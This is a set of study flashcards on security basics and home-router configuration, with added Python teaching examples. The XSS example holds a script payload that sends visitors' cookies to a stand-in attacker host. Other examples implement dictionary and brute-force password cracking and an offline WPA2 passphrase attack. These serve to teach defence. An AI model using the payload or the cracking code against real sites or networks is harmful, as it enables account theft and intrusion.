CHAPTER SIXTEEN: SOHO CONFIGURATION Flashcards

(54 cards)

1
Q

What is Information Security?

A

Information security is all about protecting data — whether it’s on a computer, a phone, or printed on paper — from people who shouldn’t see it, change it, or destroy it.

To keep data safe, security focuses on three main goals, known as the CIA Triad:

  1. Confidentiality – Only the right people should be able to see the data.
  2. Integrity – The data should be accurate and not messed with unless it’s allowed.
  3. Availability – The data should be accessible to the people who are supposed to have access when they need it.
2
Q

What is Cybersecurity?

A

Cybersecurity is like a special branch of information security that focuses on protecting computers, networks, and digital data from attacks — like hackers trying to get in.

3
Q

How Do We Protect Systems?

A

We use security policies (rules) and controls (tools/settings) to protect systems. Making a system more secure is called hardening it — kind of like putting armor on it.

But to know how secure a system is, we do security assessments. These look for:

Vulnerabilities – Weak spots in the system (like unlocked doors).

Threats – Things or people that might take advantage of those weak spots (like hackers).

Risks – The chance that a threat will successfully exploit a vulnerability and what damage it could cause.

4
Q

What Are Vulnerabilities?

A

A vulnerability is any weakness that a hacker (or even an accident) could use to break into a system. Examples include:

Badly installed software

5
Q

What is a Non-Compliant System?

A

A configuration baseline is like a checklist for how a system should be securely set up.

A non-compliant system is one that no longer follows that secure checklist — it’s drifted from what’s considered safe. We use vulnerability scanners (tools that scan systems) to catch these.

6
Q

What Are Unprotected Systems?

A

An unprotected system is missing some important security settings or tools. This means it has a bigger attack surface — more ways for hackers to get in.

7
Q

What Are Software and Zero-Day Vulnerabilities?

A

A software vulnerability is a coding mistake that could let hackers crash the system or run their own code on it.

An exploit is the tool or method that takes advantage of that flaw.

A zero-day vulnerability is a flaw that attackers can exploit before the software maker has released a fix, often before the maker even knows the flaw exists. Until a patch ships there is nothing to install, so the only defences are mitigations such as reducing exposure to the affected component. Very dangerous!

8
Q

What About Unpatched or End-of-Life Systems?

A

An unpatched system is one that hasn’t had the latest updates or security fixes.

An end-of-life (EOL) system is so old the company that made it no longer supports or fixes it.

9
Q

What is BYOD and Why is it Risky?

A

Bring Your Own Device (BYOD) means employees use their personal phones or laptops at work. It’s convenient, but super hard to keep secure:

So many different devices and versions
Harder for IT to control
Makes the attack surface bigger

10
Q

What is Social Engineering?

A

Social engineering is when hackers trick people into giving up private information. Instead of hacking a computer, they “hack” the human.

11
Q

Dumpster Diving

A

Hackers can go through trash to find helpful info like:

Names, job titles
Internal phone numbers
Old documents or USB drives

This helps them seem more legit when impersonating someone.

12
Q

Shoulder Surfing

A

This is when a hacker watches someone type their password. It doesn’t have to be literally over the shoulder — they could use binoculars or cameras too.

13
Q

Tailgating

A

Imagine someone walks through a secure door with a key card, and you slip in right behind them before the door closes. That’s tailgating — you’re sneaking in without being allowed.

14
Q

Piggybacking

A

Similar to tailgating, but here, you ask someone to let you in. Maybe you pretend to be a janitor and say, “Can you hold the door while I bring in my cleaning cart?” — and they do. That’s piggybacking.

15
Q

Phishing

A

Phishing messages pretend to be from trusted sources (like your bank or IT department). They might ask you to:

Click a link to a fake website.

Download a fake antivirus that’s actually malware.

Let someone “fix” your computer remotely, but they’re actually breaking in.

16
Q

Types of phishing

A

Spear Phishing: Targeted. They know something about you — your name, job, or what you’re working on — to make it more convincing.

Whaling: Phishing aimed at top bosses (like CEOs) — the “big fish.”

Vishing: Phishing done by voice, like someone calling and pretending to be your bank, asking for your PIN.

17
Q

Evil Twin

A

This is like phishing, but instead of using email, the attacker sets up a fake Wi-Fi network.

It might look like a legit network (like “Starbucks_WiFi”), but it’s fake.

When you connect, it might take you to a fake login page to steal your password.

They can even knock out the real Wi-Fi so you’re forced to connect to theirs.

18
Q

Static Threats and Modern Threats

A

Static threats are old-school viruses and malware whose code contains a fixed, recognizable pattern (a signature). Antivirus software could detect them easily by matching that signature.
But attackers got smarter.

Modern threats are sneakier: they change their code from copy to copy, hide inside legitimate tools, or run only in memory, so a simple pattern match misses them. So now we study the behaviour of the attack (what a program actually does) instead of only what its code looks like.

19
Q

External vs. Internal Threats

A

External Threat Actor: Someone outside your organization — a hacker from the internet or someone breaking in physically.

Internal Threat Actor: Someone inside your organization — like an employee or contractor.
They might be malicious (on purpose) or non-malicious (careless, or tricked by an attacker).

20
Q

Footprinting

A

This is the hacker doing recon (like a spy) — collecting info about your systems before attacking.

They might scan your website, ports, or search for leaked info to figure out how to break in.

21
Q

Spoofing

A

Spoofing means pretending to be something or someone you're not, kind of like wearing a mask.

It could mean faking an email sender address, an IP address, a Wi-Fi network name, or even a digital certificate (the credential a website presents to prove its identity).

If a hacker captures your session token (a small bit of data that says you're logged in) and re-sends it to act as you, that's a replay attack: one way of spoofing a user.

22
Q

On-Path Attacks (a.k.a. Man-in-the-Middle)

A

This is when a hacker secretly sits in the middle of two computers talking to each other.

They can see the data and maybe even change it without you knowing.

Evil Twin Wi-Fi is one example — it sits between you and the real internet.

23
Q

Denial of Service (DoS) Attacks

A

These attacks flood a website or service with junk so it crashes or slows down.

Could be digital (sending tons of fake traffic) or physical (like cutting power).

Sometimes done just to cause trouble, or to distract security while the real attack happens elsewhere.

24
Q

Distributed DoS (DDoS) and Botnets

A

A DDoS attack comes from lots of hacked devices at once — not just one.

These devices (could be hacked computers, webcams, etc.) form a botnet.

The hacker controls all these devices from a command-and-control (C2) server and launches massive attacks.

25
Q

On-Path and Malware Attacks

A

On-path attack (also known as "man-in-the-middle"): An attacker secretly sits between you and a website, watching or even changing your messages.

Malware: Malicious software (viruses, trojans, spyware) installed on your computer, for example to steal passwords or other data.

26
Q

Cryptographic Hash

A

Instead of saving your actual password, systems transform it into a fixed-length code (a hash) that cannot be turned back into the original. It's like turning your password into a smoothie: you can't get the fruit back out. When you log in, the system hashes what you typed and compares the two hashes, so even the system admin never sees your real password.

27
Q

Password Cracking

A

Hackers who steal a hash try to guess the password that produced it: they hash each guess and compare. There are two main ways:

Dictionary Attack: The tool tries common words, phrases and previously leaked passwords (like "password123" or your pet's name).

Brute Force Attack: It tries every possible combination (like a robot going "aaaa", "aaab", "aaac"...).

Short or common passwords are cracked in seconds or minutes. Long, random ones take far longer, and a slow, salted hash (such as bcrypt or PBKDF2) makes every single guess expensive.

28
Q

Cross-Site Scripting (XSS) Attacks

A

When a website doesn't properly check or encode what users type in, hackers can sneak in scripts (tiny programs) that run in other visitors' browsers. Websites run code on both the server side (where the website lives) and the client side (your browser); XSS abuses the client side. If a site lets you type in your name and you instead enter a bit of script, that script might be echoed back into the page and run.

Example: A hacker posts a hidden script in a comment or profile field. When others visit the page, the script runs in their browser and quietly sends their session cookie to the hacker.

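The stored XSS case from this card, as an added example (not from the flashcards): a "comments" page that stores what visitors submit and shows it to every later visitor, once built by pasting the raw text into the HTML and once with output encoding. The comment store, the payload and the hostname attacker.example are constructed for the demo.

```python
import html

# Constructed comment store; the second entry is an attacker's submission
# that would ship the victim's cookie to a hypothetical attacker host.
COMMENTS = [
    "Great router guide, thanks!",
    '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>',
]


def render_comments_vulnerable(comments):
    # Raw user input concatenated into markup: whatever the attacker typed,
    # including the <script> tag, becomes part of the page for every visitor.
    items = "".join("<li>" + c + "</li>" for c in comments)
    return "<ul>" + items + "</ul>"


def render_comments_safe(comments):
    # html.escape converts < > & " ' into entities, so the browser displays the
    # payload as text instead of executing it. Output encoding at render time
    # is the core XSS defence; input validation on its own is not enough.
    items = "".join("<li>" + html.escape(c, quote=True) + "</li>" for c in comments)
    return "<ul>" + items + "</ul>"


def has_live_script(markup):
    # Crude detector for the demo: an unescaped <script tag means a browser
    # would execute it. An escaped one appears as &lt;script&gt; instead.
    return "<script" in markup.lower()


if __name__ == "__main__":
    print(render_comments_vulnerable(COMMENTS))
    print(render_comments_safe(COMMENTS))
```

The vulnerable renderer emits the attacker's tag verbatim, so every visitor's browser runs it; the safe renderer shows the same text as harmless characters. Real templating engines (Jinja2, Django templates, React) do this escaping by default, which is why hand-built string concatenation is the usual way XSS gets in.
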
29
Q

SQL Injection Attacks

A

Websites often talk to databases using a language called SQL to get or change information. SQL injection is when a hacker types SQL commands into a website's input box. If the website pastes the input straight into its query text instead of passing it as a separate parameter, those commands get sent to the database.

Example: Instead of typing a name, the hacker types a quote character followed by more SQL, which tricks the database into logging them in without a password or giving up data such as usernames and password hashes.

30
Q

Cryptographic Hashes

A

A hash function turns any data into a fixed-size string (a short code). A cryptographic hash is a special one-way version: you can make the hash from your data, but you can't get the original data back from it, and you can't easily find two different inputs with the same hash.

Great for storing passwords: even if hackers get the hash, they can't turn it back into your password. They can still guess-and-check, which is why stored password hashes should be salted and deliberately slow.

31
Q

Two types of Cryptographic Hashes

A

SHA (Secure Hash Algorithm): a family, not one algorithm. SHA-1 is deprecated (collisions have been demonstrated); SHA-2 (SHA-256, SHA-512) and SHA-3 are the ones still used.

MD5 (Message Digest 5): older and broken for collision resistance; not safe for any new use.

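An added example (not from the flashcards) tying cards 26, 27, 30 and 31 together: MD5 and SHA-256 from Python's standard library, the dictionary and brute-force attacks from card 27 run against an unsalted SHA-256 hash, and a salted, slow hash (PBKDF2) that makes every guess expensive. The wordlist and passwords are constructed for the demo.

```python
import hashlib
import itertools
import os
import string


def sha256_hex(text):
    return hashlib.sha256(text.encode()).hexdigest()


def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()


# Constructed mini wordlist (real ones hold millions of leaked passwords).
WORDLIST = ["123456", "password", "qwerty", "letmein", "password123", "fluffy"]


def dictionary_attack(target_hex, wordlist, hash_fn=sha256_hex):
    # Hash each candidate and compare. Returns (password, guesses tried).
    for tried, word in enumerate(wordlist, start=1):
        if hash_fn(word) == target_hex:
            return word, tried
    return None, len(wordlist)


def brute_force(target_hex, alphabet=string.ascii_lowercase, max_len=3, hash_fn=sha256_hex):
    # Try every string over the alphabet, shortest first. The search space
    # grows as len(alphabet) ** length, which is why length beats complexity.
    tried = 0
    for length in range(1, max_len + 1):
        for chars in itertools.product(alphabet, repeat=length):
            tried += 1
            candidate = "".join(chars)
            if hash_fn(candidate) == target_hex:
                return candidate, tried
    return None, tried


def salted_slow_hash(password, salt, rounds=100_000):
    # PBKDF2-HMAC-SHA256: a random per-user salt means identical passwords
    # hash differently (no shared precomputed tables), and the iteration
    # count makes each guess ~100k times more expensive than a plain SHA-256.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds).hex()


def same_password_same_unsalted_hash(p1, p2):
    # Unsalted hashes leak when two users share a password.
    return sha256_hex(p1) == sha256_hex(p2)


def same_password_different_salted_hash(p1, p2):
    # With fresh random salts the same password gives unrelated hashes.
    return salted_slow_hash(p1, os.urandom(16)) != salted_slow_hash(p2, os.urandom(16))


if __name__ == "__main__":
    print(dictionary_attack(sha256_hex("password123"), WORDLIST))  # found on guess 5
    print(brute_force(sha256_hex("cat")))                          # found after 2074 guesses
    print(brute_force(sha256_hex("cats")))                         # not found within 3 chars
```

The brute-force counter shows the arithmetic behind "simple passwords are cracked in minutes": three lowercase letters is 18,278 guesses, which a laptop finishes instantly, while each extra character multiplies the work by the alphabet size. Note that the same `dictionary_attack` works on an MD5 or SHA-256 hash alike; the algorithm's strength is irrelevant when the input is guessable, which is what the salt and the iteration count address.
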
32
Q

Symmetric Encryption

A

This is the basic type of encryption: one secret key does both the locking (encrypting) and unlocking (decrypting) of the data.

The problem? You have to safely share the key with the other person, which is hard.

It's fast, so it's used for encrypting big chunks of data.

Example: AES (Advanced Encryption Standard) is the popular, strong one.

33
Q

Asymmetric Encryption

A

Now we get fancy. There are two keys: a public key (you can share it with anyone) and a private key (keep it secret).

If someone locks a message using your public key, only your private key can unlock it.

Why it's cool: You don't need to send your secret key around. You can safely talk to strangers on the internet, as long as you can be sure the public key really belongs to them (that is what certificates are for).

34
Q

Key Exchange

A

Why bother? Because symmetric encryption is fast, but you can't safely send the key. Asymmetric encryption solves the key-sharing problem but is slow.

So here's the trick: you use the receiver's public key to encrypt a fresh secret key (for symmetric encryption) and send that. Only they can open it with their private key. Now you both have the same secret key and can talk quickly and safely using symmetric encryption.

That secret key is called a session key. If it is generated fresh for each session and thrown away afterwards, rather than derived from a long-term key, it's called an ephemeral key; that way a key stolen later can't decrypt old recorded sessions.

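The hybrid scheme this card describes, as an added example (not from the flashcards): a fresh session key is wrapped with the receiver's public key and the message itself is encrypted with a fast symmetric keystream under that key. The toy choices are labelled so nobody copies them: the RSA primes are the Mersenne primes 2^61-1 and 2^89-1 (a modulus of about 150 bits, enough to hold a 128-bit key as one integer), there is no RSA padding, and the "symmetric cipher" is SHA-256(key || counter) XORed with the data, standing in for AES, which the standard library does not ship.

```python
import hashlib
import secrets

# Toy textbook RSA parameters (illustration only; real RSA uses 2048-bit or
# larger random primes and OAEP padding).
P = (1 << 61) - 1
Q = (1 << 89) - 1
E = 65537


def rsa_keygen():
    # Returns (public_key, private_key) as (e, n) and (d, n).
    n = P * Q
    phi = (P - 1) * (Q - 1)
    d = pow(E, -1, phi)          # modular inverse, Python 3.8+
    return (E, n), (d, n)


def rsa_encrypt_int(m, pub):
    e, n = pub
    assert 0 <= m < n, "message integer must be smaller than the modulus"
    return pow(m, e, n)


def rsa_decrypt_int(c, priv):
    d, n = priv
    return pow(c, d, n)


def keystream_xor(key, data):
    # Symmetric: the same call encrypts and decrypts. Keystream block i is
    # SHA-256(key || i); never reuse a (key, counter) pair for two messages.
    out = bytearray()
    for i in range(0, len(data), 32):
        block = hashlib.sha256(key + (i // 32).to_bytes(4, "big")).digest()
        out.extend(a ^ b for a, b in zip(data[i:i + 32], block))
    return bytes(out)


def sender_side(receiver_pub, plaintext):
    # 1. Make a fresh (ephemeral) session key.  2. Wrap it with the receiver's
    # public key.  3. Encrypt the bulk data symmetrically under it.
    session_key = secrets.token_bytes(16)
    wrapped_key = rsa_encrypt_int(int.from_bytes(session_key, "big"), receiver_pub)
    return wrapped_key, keystream_xor(session_key, plaintext)


def receiver_side(receiver_priv, wrapped_key, ciphertext):
    # Only the holder of the private key can unwrap the session key.
    session_key = rsa_decrypt_int(wrapped_key, receiver_priv).to_bytes(16, "big")
    return keystream_xor(session_key, ciphertext)


def demo(message=b"meet at the usual place at noon; bring the printed configs"):
    pub, priv = rsa_keygen()
    wrapped_key, ciphertext = sender_side(pub, message)
    return receiver_side(priv, wrapped_key, ciphertext)


if __name__ == "__main__":
    print(demo())
```

The slow public-key operation runs once, on 16 bytes; everything else is the cheap symmetric step, however long the message. Because `sender_side` draws a new session key every call, each session is protected by its own key, which is the "ephemeral" property the card mentions. Modern protocols such as TLS 1.3 use Diffie-Hellman rather than RSA wrapping to establish the session key, but the two-layer structure is the same.
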
35
Q

WPA (Version 1)

A

Came after WEP, which was super weak. Still used a weak encryption method called RC4 (a stream cipher that scrambles your data), because it had to run on existing WEP hardware.

To make it better than WEP, WPA added TKIP (Temporal Key Integrity Protocol). TKIP changes the per-packet encryption key frequently, so hackers can't just crack one key and use it forever.

But even with TKIP, WPA still had security issues, including replay and packet-injection attacks (where a hacker captures your traffic and reuses or tampers with it to trick the network).

36
Q

WPA2

A

A big upgrade over WPA. Replaces RC4 + TKIP with AES + CCMP.

AES = a very strong encryption algorithm (used by governments).

CCMP = the mode that both encrypts your data and checks that it hasn't been tampered with, with a packet counter so replayed messages are rejected.

Much harder for hackers to break in or replay old messages.

37
Q

WPA3

A

Even WPA2 has known weaknesses, so we now have WPA3. It brings:

SAE (Simultaneous Authentication of Equals) in place of deriving the key straight from the passphrase. The 4-way handshake still runs, but:
 - In WPA2-PSK, an attacker who captures the handshake can guess the passphrase offline, as fast as their hardware allows.
 - With SAE, each guess requires a live exchange with the network, so offline cracking no longer works.

Stronger encryption: WPA3-Personal keeps AES-CCMP; the WPA3-Enterprise 192-bit mode uses AES-GCMP-256.

Protected Management Frames: These are the control messages Wi-Fi devices send each other when joining or leaving the network. WPA3 requires them to be protected, to stop spoofing and forced disconnects (deauthentication attacks).

Wi-Fi Enhanced Open (introduced alongside WPA3): Even if a Wi-Fi network has no password, the traffic is still encrypted, so strangers nearby can't read it.

38
Q

Wi-Fi Authentication Methods

A

Authentication = proving who you are before you're allowed on the network.

  1. Open Authentication: No password at all; not secure.
  2. Personal Authentication: One shared passphrase, used in homes or small businesses.
  3. Enterprise Authentication: Individual credentials checked by an authentication server.

39
Q

WPA2-PSK (Pre-Shared Key)

A

Everyone uses the same password (passphrase). The passphrase and the network name (SSID) are run through a slow hash (PBKDF2) to produce a 256-bit key called the PMK (Pairwise Master Key). The PMK is then used in the 4-way handshake to create the session keys that encrypt your traffic.

If the passphrase is weak, an attacker who captures one 4-way handshake can guess it offline, hashing candidate passphrases until one reproduces the handshake.

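How the passphrase becomes the PMK, and why a weak one falls to an offline dictionary attack, as an added example (not from the flashcards). The SSID "HomeNet", the wordlist and the two passphrases are constructed for the demo; the "password"/"IEEE" pair is the published IEEE 802.11 test vector, which the stand-alone run checks against.

```python
import hashlib


def derive_pmk(passphrase, ssid):
    # WPA/WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID as salt,
    # 4096 rounds, 256 bits). Because the SSID is the salt, a precomputed
    # table only helps against networks with that exact name.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def offline_dictionary_attack(target_pmk, ssid, wordlist):
    # An attacker holding one captured 4-way handshake checks each candidate
    # offline: derive the PMK, recompute the handshake's MIC from it, compare.
    # PBKDF2 is the expensive step, so the demo compares PMKs directly; what
    # matters is that every guess costs 4096 SHA-1 rounds and nothing more.
    for tried, candidate in enumerate(wordlist, start=1):
        if derive_pmk(candidate, ssid) == target_pmk:
            return candidate, tried
    return None, len(wordlist)


# Constructed wordlist; real ones hold hundreds of millions of entries.
WORDLIST = ["password", "12345678", "sunshine1", "iloveyou", "letmein123"]


def crack_weak_network():
    # The "captured" PMK of a network whose passphrase is in the wordlist.
    return offline_dictionary_attack(derive_pmk("sunshine1", "HomeNet"), "HomeNet", WORDLIST)


def crack_strong_network():
    # A long random passphrase is simply never in the list.
    return offline_dictionary_attack(
        derive_pmk("pelican-orbit-9-velvet-cask", "HomeNet"), "HomeNet", WORDLIST
    )


if __name__ == "__main__":
    vector = derive_pmk("password", "IEEE").hex()
    print("test vector ok:", vector == "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e")
    print(crack_weak_network())    # ('sunshine1', 3)
    print(crack_strong_network())  # (None, 5)
```

Nothing on the router side can make a weak passphrase safe under WPA2-PSK, because the attacker needs the network only long enough to capture one handshake; the defences are a long random passphrase or moving to WPA3-Personal, where SAE removes the offline step entirely.
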
40
Q

WPA3-Personal (with SAE)

A

Still uses a shared passphrase, but the PMK is established with SAE, a password-authenticated key exchange, instead of being derived directly from the passphrase. A captured handshake is no longer enough to guess the passphrase offline, so it is much safer against password guessing.

41
Q

Enterprise Authentication

A

Used in offices and large organizations. Instead of one password for everyone, each user has their own credentials.

Uses 802.1X, which carries EAP (Extensible Authentication Protocol). The access point just passes the login exchange to a AAA server (Authentication, Authorization, Accounting). Think of the AAA server as a security guard who checks your ID. Once approved, the server and the device generate encryption keys without the AP ever seeing any passwords.

Much more secure, especially if you use EAP-TLS (Transport Layer Security), where both the user's device and the server prove their identity with certificates, so there is no password to phish or crack.

42
Q

RADIUS (Remote Authentication Dial-In User Service)

A

RADIUS is the protocol the AAA server speaks. Think of the RADIUS server as the security guard at the door: it checks your ID (your credentials), often by looking them up in a directory such as Active Directory or LDAP.

Your Wi-Fi access point (or router) is set up as a client of the RADIUS server. When you try to connect, the AP doesn't check your password; it forwards the exchange to the RADIUS server. The AP and server trust each other because they share a secret (the shared secret). That secret should be long and random, and the link between AP and server should ideally run on a separate management network.

43
Q

TACACS+ (Terminal Access Controller Access-Control System Plus)

A

TACACS+ is another way to do the same job, with some differences:

It's mostly used to control administrative access to routers, switches and other network hardware.

It was created by Cisco but is supported by other vendors too.

Compared to RADIUS, it separates authentication, authorization and accounting, so it gives finer control over what people can do once they're logged in (for example, which commands an admin may run). It also encrypts the whole packet body, whereas RADIUS only obscures the password.

44
Q

Kerberos

A

Kerberos is like a super smart bouncer, used in Windows (Active Directory) networks:

It lets you log in once (Single Sign-On, or SSO) and then access multiple systems without logging in again and again.

It gives out tickets, kind of like wristbands at a concert, that say which services you're allowed into.

Most Wi-Fi access points don't talk to Kerberos directly. Instead, they use RADIUS or TACACS+, and that server checks the credentials against the domain.

45
Q

Firmware Updates

A

Your router has software inside it (firmware) that needs to be updated. Updates fix bugs and security holes and can add newer features such as WPA3.

Download the update only from the manufacturer's website (or use the router's built-in update function), then upload it through the router's control panel. Turn on automatic updates if the router offers them, and replace a router whose manufacturer no longer publishes updates: it is end-of-life and its known holes will never be fixed.

46
Q

Encryption Settings (Wi-Fi Password Protection)

A

Encryption is like a secret code that protects your Wi-Fi. The best one right now is WPA3. If your phone or laptop doesn't support WPA3, you can enable a WPA2/WPA3 compatibility (transition) mode, but this weakens the protection a bit, because a client can be pushed down to WPA2.

WPA2 (AES/CCMP) is better than WPA2 (TKIP); TKIP is old and less secure and should be disabled.

Choose a strong passphrase (your Wi-Fi password): long, and not a dictionary word. It is used to generate the key that locks your network, and a weak one can be cracked offline from a single captured handshake.

47
Q

Content Filtering

A

Think of it like parental controls for your Wi-Fi. Your router uses block lists (blocked sites) and reputation databases (known bad sites) to block dangerous or inappropriate content. You can block certain keywords or websites, or set time limits for Internet use.

48
Q

What is Port Forwarding?

A

Every device has ports, like doors for network traffic. Port forwarding tells your router: "If someone on the Internet knocks on this door, send them to this device inside."

For example: hosting a Minecraft server? Forward port 25565 to the server's internal address so friends can connect.

Remember that a forwarded port exposes that service to the whole Internet, so only forward what you need, keep that software patched, and remove the rule when you're done.

49
Q

Static IP & DHCP Reservation

A

Devices usually get an address from your router via DHCP, but that address can change over time. For port forwarding to work reliably, the device must keep the same address. You can do this with a DHCP reservation (like reserving a hotel room) keyed on the device's MAC address (its unique hardware ID), or by giving the device a static IP outside the DHCP range.

50
Q

Port Triggering

A

This is for more complex apps that use multiple ports (like FTP for file sharing). When a device inside reaches out to a server on a trigger port, the router temporarily opens the related inbound ports so that server can respond; the opening closes again when the session ends, so nothing stays exposed permanently.

51
Q

UPnP (Universal Plug-and-Play)

A

UPnP is a feature where your Xbox, PlayStation or Zoom app tells the router, "Hey, open this port for me." It's convenient but can be dangerous, because any device (or malware) on the network can open doors automatically without asking you.

Best advice: disable UPnP unless you really need it, and never allow it from the outside (WAN) interface.

52
Q

Equipment Locks

A

Kensington lock: A cable that locks your laptop to a desk.

Chassis locks: Lock a computer case so no one can open it and steal parts.

Rack cabinets: Lockable metal cages that secure network gear.

53
Q

Surveillance & Alarms

A

Circuit alarms: Trip when a door, window or case is opened.

Motion sensors: Detect movement.

Proximity alarms: Trigger when someone gets close to a protected object.

Duress alarms: Used in emergencies to silently call for help.